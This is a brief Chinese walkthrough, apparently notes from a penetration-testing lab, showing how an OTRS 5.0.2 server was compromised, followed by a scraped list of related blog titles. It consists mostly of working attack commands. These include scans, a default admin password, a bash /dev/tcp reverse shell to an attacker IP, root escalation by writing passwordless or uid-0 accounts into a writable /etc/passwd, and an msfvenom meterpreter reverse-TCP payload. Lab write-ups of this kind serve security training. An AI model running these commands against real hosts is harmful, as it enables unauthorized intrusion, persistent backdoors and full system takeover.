nmap -T4 -A -sS -sV -vv --script vuln -p- --open -n -Pn 10.11.1.39 -oX 10.11.1.39.xml

xsltproc -o 10.11.1.39.html 10.11.1.39.xml

nikto -h 10.11.1.39

扫描到/otrs/index.pl 确认版本为5.0.2

默认用户(root@localhost),密码是OTRs

搜索漏洞OTRS 5.0.x/6.0.x - Remote Command Execution (1) - Perl webapps Exploit

利用/usr/bin/bash   -i >& /dev/tcp/10.11.0.243/1234 0>&1 & 反弹shell

通过linuxprivchecker.py 搜索到/etc/passwd 可写入

未验证:echo root::0:0:root:/root:/bin/bash > /etc/passwd 直接覆盖也行

perl -le 'print crypt("password@123","addedsalt")'生成带盐值得密码advwtv/9yU5yQ

echo "test:advwtv/9yU5yQ:0:0:User_like_root:/root:/bin/bash">>/etc/passwd 追加账号密码

python -c "import pty;pty.spawn('/bin/bash')"   模拟终端

su test 完成root提权

生成linux木马反弹:msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=10.11.0.243 LPORT=4444 -f elf -o /root/payload.elf

下载重要文件

find / -perm -u=s -type f 2>/dev/null 查找suid

渗透测试实战-OTRS 5.0.x/6.0.x漏洞利用相关推荐

  1. 【渗透测试实战】PHP语言有哪些后门?以及利用方法

    目录 后门 php.ini构成的后门 .user.ini文件构成的PHP后门 反序列化 PHP序列化实现 常见处理器 序列化格式 private与protect PHP反序列化漏洞 利用点 SoapC ...

  2. web渗透测试实战-SQLMAP

    一.实验项目名称 web渗透测试实战-SQLMAP 二.实验目的及要求 熟悉SQL注入漏洞原理 熟悉SQLMAP工具使用. 1.获取数据库信息:数据库漏洞.数据库名.数据库版本等 python sql ...

  3. 《内网安全攻防:渗透测试实战指南》读书笔记(八):权限维持分析及防御

    目录 前言 一.操作系统后门 1.粘滞键后门 2.注册表注入后门 3.计划任务后门 4.meterpreter后门 5.Cymothoa后门 6.WMI后门 二.WEB后门 1.Nishang下的We ...

  4. 《内网安全攻防:渗透测试实战指南》读书笔记(二):内网信息收集

    目录 前言 一.收集本机信息 1.手动搜集 (1)查询网络配置 (2)查询操作系统及软件的信息 (3)查询本机服务信息 (4)查询进程列表 (5)查看启动程序信息 (6)查看计划任务 (7)查看主机开 ...

  5. Windows网络服务渗透测试实战-跨网段攻击

    一.实验项目名称 Windows网络服务渗透测试实战-跨网段攻击 二.实验目的及要求 掌握对跨网段攻击的方法. 熟悉Metasploit终端的使用方法. 熟悉通过meterpreter进行后渗透操作 ...

  6. 《内网安全攻防:渗透测试实战指南》读书笔记(四):权限提升分析及防御

    目录 前言 一.系统内核溢出漏洞提权分析及防范 1.通过手动执行命令发现缺失补丁 (1)MS16-032(KB3139914) 2.利用MSF发现缺失补丁 3.Windows Exploit Sugg ...

  7. 《内网安全攻防:渗透测试实战指南》读书笔记(一):内网渗透测试基础

    目录 前言 一.内网基础知识 1.工作组 2.域 3.活动目录 (1)活动目录的功能 (2)DC和AD区别 4.安全域的划分 (1)DMZ (2)内网 5.域中计算机的分类 6.域内权限 (1)组 ( ...

  8. Windows网络服务渗透测试实战MS17-010漏洞复现

    一.实验项目名称 Windows网络服务渗透测试实战MS17-010漏洞复现 二.实验目的及要求 熟悉Metasploit终端的使用方法: 掌握对MS17-010漏洞攻击的方法. 三.复现步骤(附加文 ...

  9. VulnHub渗透测试实战靶场 - THE ETHER: EVILSCIENCE

    VulnHub渗透测试实战靶场 - THE ETHER: EVILSCIENCE 环境下载 THE ETHER: EVILSCIENCE靶机搭建 渗透测试 信息搜集 漏洞挖掘 getshell 提权 ...

最新文章

  1. OWC的问题——散点图与折线图如何才能同时显示
  2. python代码转成java_如何实现Java代码转换成python代码
  3. 大型互联网架构概述,看完文章又涨知识了
  4. Example of BeanFactoryAware in Spring--转
  5. select点击option获取文本输入框的焦点事件
  6. 计算机领域的范式,编程领域的范式转移
  7. POJ - 1381 Secret Code(dfs+高斯整数)
  8. 浏览器渲染机制面试_【前端面试必考题】页面渲染机制(一)
  9. 发布ASP.NET程序至IIS7
  10. 没有匹配的验证协议_ORA-28040:没有匹配的验证协议
  11. 二叉树C++ | 广度优先遍历(层级顺序遍历)_2
  12. 《数据结构与算法》——线性表之顺序表(SqList)总结
  13. Mac Sublime Text设置中文
  14. 使用three.js模拟城市灯光秀
  15. js如何往数组Array中添加删除元素
  16. 传奇开个服大概需要多少费用?
  17. 全网首发:VS编译出错:两个输出文件名解析为同一个输出路径
  18. windows10 杀掉一个端口
  19. Unity3D蓝牙连接Mi Band 5手环获取实时心率
  20. 计算机密码忘记旗舰版7,电脑密码忘了怎么办win7旗舰版_w7旗舰版笔记本开机密码忘了如何解决...

热门文章

  1. php $.ajaxfileupload,ajaxfileupload上传时出现的问题详解
  2. mysql怎么建表语句_mysql 建表语句
  3. 不等式约束二次规划——有效集法
  4. codeup《算法笔记》题目索引(题目+答案+思路)
  5. 硬盘主引导记录(MBR)及其结构详解
  6. Android11 刷机教程
  7. 微信小程序支付之多次支付
  8. Hive窗口函数详解
  9. qt中label画圆代表指示灯_使用qpaint和paintEvent在PYQT5中QLabel中包含的Pixmap上绘制圆...
  10. 大学物理 复习指导、公式推导精简过程、结论归纳(物理学教程 第三版 上册 马文蔚 周雨青)